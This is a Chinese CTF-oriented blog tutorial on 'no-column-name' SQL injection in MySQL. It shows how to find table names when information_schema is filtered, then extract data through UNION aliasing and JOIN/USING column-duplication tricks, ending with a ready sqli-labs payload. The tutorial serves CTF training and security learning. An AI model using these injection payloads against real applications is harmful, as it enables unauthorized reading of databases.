SQL注入之 无列名注入 原理详解

最新推荐文章于 2024-08-05 19:35:33 发布
最新推荐文章于 2024-08-05 19:35:33 发布
阅读量706 收藏 5
点赞数 2
分类专栏: CTF-web 文章标签: sql oracle 数据库 SQL注入 无列名注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jayjay___/article/details/132956870
版权

为什么会需要无列名注入?

我们常用的SQL注入方法是通过information_schema这个默认数据库来实现,可是你有没有想过,如果过滤了该数据库那么我们就不能通过这个库来查出表名和列名。不过我们可以通过两种方法来查出表名:

  1. InnoDb引擎

    从MYSQL5.5.8开始,InnoDB成为其默认存储引擎。而在MYSQL5.6以上的版本中,inndb增加了innodb_index_stats和innodb_table_stats两张表(mysql.innodb_table_stats),这两张表中都存储了数据库和其数据表的信息,但是没有存储列名。高版本的 mysql 中,还有 INNODB_TABLES 及 INNODB_COLUMNS 中记录着表结构。

  2. sys数据库

    在5.7以上的MYSQL中,新增了sys数据库,该库的基础数据来自information_schema和performance_chema,其本身不存储数据。可以通过其中的schema_auto_increment_columns(sys.schema_auto_increment_columns)来获取表名。

但是上述两种方法都只能查出表名,无法查到列名,这时我们就要用到无列名注入了。无列名注入,顾名思义,就是不需要列名就能注出数据的注入。

无列名注入使用条件

无列名注入主要是适用于已经获取到数据表,但无法查询列的情况下,在大多数 CTF 题目中,information_schema 库被过滤,使用这种方法获取列名。

无列名注入原理

无列名注入的原理其实很简单,就是联合查询创建虚拟数据。可以看作将我们不知道的列名进行取别名操作,在取别名的同时进行数据查询,所以查询字段数一定要相同,如果我们查询的字段多于数据表中列的时候,就会出现报错。

实战演示:

正常查user表的数据是select * from user;

image-20230917145304914

用联合查询的方式来查一下表中数据select 1,2,3 union select * from user;。很明显创建了虚拟数据(虚拟字段值123和虚拟表),虚拟表中列名变成了123。

image-20230917145419828

只查一个列的字段值的话我们可以用:
解释一下,xxx就是自己命名的虚拟表的表名,可以自定义。这条sql语句在联合查询创建虚拟表xxx,虚拟列1,2,3的同时查询虚拟表第二列的数据。

select `2` from (select 1,2,3 union select * from user)xxx;

image-20230917145701326

同时查多个列

select concat(`2`,`3`) from (select 1,2,3 union select * from user)xxx;

image-20230917150452258

不过有时候 ` 也会被过滤,这时候我们就又要用到取别名(as)的操作了,把列名都换一换,那样查数据时候列名就不需要反引号了。

select 1 as a,2 as b,3 as c union select * from user;

image-20230917150229489

select b from (select 1 as a,2 as b,3 as c union select * from user)xxx;

image-20230917150304333

还有一种是利用JOIN去进行无列名注入,通过JOIN建立两个表之间的内连接,也就是说将两张表的列名给加起来,可能会爆出相同的列的名字,我们利用的就是这个特性来爆出列名。

select * from (select * from user as a join user as b)xxx;

image-20230917152950066

得到了第一个列名id,下面这个payload就会给我们回显第二列的数据。

select * from (select * from user as a join user as b using(id))xxx;

image-20230917153008543

剩下的以此类推。

select * from (select * from user as a join user as b using(id,username))xxx;

image-20230917153055650

实战sqli-labs第一关的payload:

?id=-1' union all select * from (select * from users as a join users as b)as c--+
Jay 17
关注
专栏目录
SQL注入之无列名注入
weixin_46330722的博客
11-10 4269
列名注入概念原理利用 概念 在我们进行sql注入的时候,有时候information_schema这个库可能会因为过滤而无法调用,这是我们就不能通过这个库来查出表名和列名。这时我们可以通过两种方法来查出表名: InnoDb引擎 从MYSQL5.5.8开始,InnoDB成为其默认存储引擎。而在MYSQL5.6以上的版本中,inndb增加了innodb_index_stats和innodb_table_stats两张表,这两张表中都存储了数据库和其数据表的信息,但是没有存储列名。 sys数据库 在5.7以上
SQL列名注入方法总结(基于union, join)
DawdleD的博客
05-25 2845
本文要点 通过对基于join的无列名注入攻击的研究,本文提出了一种场景以及对应的攻击方法,该攻击方法不需要使用using关键字。 本文整理了相关的博文,将在篇末展示(由于该篇博文是原创博文所以我不会把它们的内容照搬过来,请自行取阅) 一种基于join的无列名注入-1 select Host,User,Select_priv from user where User="root" 在上述场景中用户可以控制的输入是字符串"root",假设的攻击场景中我们可以突破双引号闭合并进行任意sql注入。但是我们
SQL列名注入
qq_66013948的博客
03-03 1153
​ 二次注入就是指以储存(数据库、文件)的用户输入被读取后再次进入到SQL查询语句中导致注入
sql注入之无列名注入
最新发布
m0_68976043的博客
08-05 386
我们在注入的过程中很多时候利用的就是information_schema这个库获取 table_schema table_name, column_name这些数据库内的信息,而在市面上很多厂商的waf会对其进行过滤和黑名单,而我们在不使用information_schema库,那只能去看看mysql中其他与生俱来的库,这个时候sys库就尤为显眼。
sql列名注入
xiaolong22333的博客
06-05 691
所谓无列名注入,就是不需要知道列名就能得到数据,通常都是过滤了information,让你无法得到列名 比如下面这个表,当我们不知道列名的情况下要如何得到flag呢?可以通过union来这么做 将user表的原本的3列名字变成1,2,3,将第3列别名为b,然后查询b列 buu上的[SWPU2019]Web1就是这种 但如果过滤了union这么办?还可以用join来注入,这次国赛就是这样(只可惜比赛时我还不会join,没做出来,下定决心赛后好好学学,于是就有了这篇文章。) join 连接两张表 using
列名注入
adc8848nb的博客
08-05 299
我们可以发现,mysql还有其他自带的数据库,我们可以看看用没有我们想要的东西。这里既然知道了表名就可以直接查询表的结构,来获取字段。使用 USING(id) 只会保留一个 id 列在结果中,而不会重复显示,所以第二个字段username会报错。这里我们直接将两个相同表users的所有列名都进行了查询,当遇到第一个字段就会包列重复的错误。首先需要使用到mysql的一个知识点内连接,join,语法如下。查询这个表的结构,有我想要的表名和列名。但再查询列名的时候,就只显示了一个字段。确实可以查询到所有的表名。
SQL注入各种注入原理|绕过技巧|带实例详解|
没有
03-19 8282
Union(联合)注入攻击详解、 字符型union注入、Boolean(布尔盲注)注入攻击详解、报错注入攻击详解(报错注入只显示一条结果,通常要使用limit)、时间注入攻击、堆叠查询注入攻击、二次注入攻击、宽字节注入攻击、cookie注入攻击、base64注入攻击、XFF注入攻击、SQL注入绕过技术、sql注入修复建议
SQL注入之如何检测与判断详细过程
01-31
### SQL注入检测与判断详细过程 #### 一、SQL注入简介 ...本文详细介绍了从初步判断到深入检测的全过程,希望可以帮助读者更好地理解SQL注入原理,并能够在实际工作中有效地检测和防御SQL注入攻击。
一篇学会SQL注入 | 详解SQL注入(基础向,基础到每个参数)
weixin_47075747的博客
06-14 1175
**括号里面的查询被称之为子查询,在执行顺序中子查询先执行,然后再执行外面的 select **2) 的值是确定性的,假随机。
SQL注入以及部分绕过方法详解
时乙的博客
09-23 1615
数据库知识补充 1.information_schema数据库 其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等。在information_schema 中,有数个只读表。它们实际上是视图,而不是基本表,因此,你将无法看到与之相关的任何文件。 2.information_schema.schemata表 提供了当前mysql实例中所有数据库的信息,其中需要用到的是 schema_name 这一列,存放的是各个数据库的名称 .
sql注入入门教程(附源码分析)
03-07
#### 一、SQL注入原理 1. **背景介绍** - 随着互联网技术的迅速发展,Web应用程序成为现代信息化社会的重要组成部分。 - Web应用程序通常需要与数据库交互来存储和管理数据,常用数据库包括MySQLSQL Server、...
MySQL在不知道列名情况下的注入详解
09-09
主要给大家介绍了关于MySQL在不知道列名情况下的注入的相关资料,文中通过示例代码介绍的非常详细,对大家学习或者使用mysql具有一定的参考学习价值,需要的朋友们下面来一起学习学习吧
列名&位或注入随记
Aiwin的博客
02-07 1024
列名&位或注入随记
SQL注入绕过正则及无列名注入
热门推荐
钟言的博客
12-19 1万+
本篇为SQL注入绕过正则表达式及无列名注入,详细内容包含了select\bNslS]bfrom正则 科学计数法绕过 过滤information 四、无列名注入 1、利用 join-using 注列名 2、无列名查询 五、报错注入7大常用函数 1.ST LatFromGeoHash() (mysql>=5.7.x)payload 2.ST LongFromGeoHash (mysql>=5.7.x) payload 3.GTID (MySQL >= 5.6.X - 显错
深入浅出带你学习无列名注入
郊眠寺
02-16 1027
今天给大家带来了无列名注入的知识点不知道大家学会了没有,简单来说无列名注入还是挺考察思维的需要我们构造查询的payload并写出脚本,有兴趣的小伙伴不妨自己去试一下,喜欢本文希望可以一键三连支持一下。最近找到一个VUE的文档,它将VUE的各个知识点进行了总结,整理成了《Vue 开发必须知道的36个技巧》。内容比较详实,对各个知识点的讲解也十分到位。
Mysql列名注入/PDO/变量注入
神隐哥的博客
03-02 557
简介 在mysql=>5版本中有information_schema数据库可以获取库名表名列名,在sql注入中十分常见。当过滤or时。这个库就会被过滤。 在Mysql5.5.x之后。默认使用innodb作为存储引擎 1。 5.6.x之后。innodb加了两个表。分别为 innodb_index_stats innodb_table_stats 这两个表都会存储数据库和对应的表。但是没有列 select group_concat(table_name) from mysql.innodb_ta
深入理解Web安全:SQL注入攻击详解
"Web安全之SQL注入攻击" 在Web安全领域,SQL注入攻击是一种常见的威胁,它发生在Web应用程序未能正确验证或转义用户输入的情况下。当用户输入的数据与数据库查询语句合并时,攻击者可以通过构造恶意的SQL语句来获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Jay 17

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值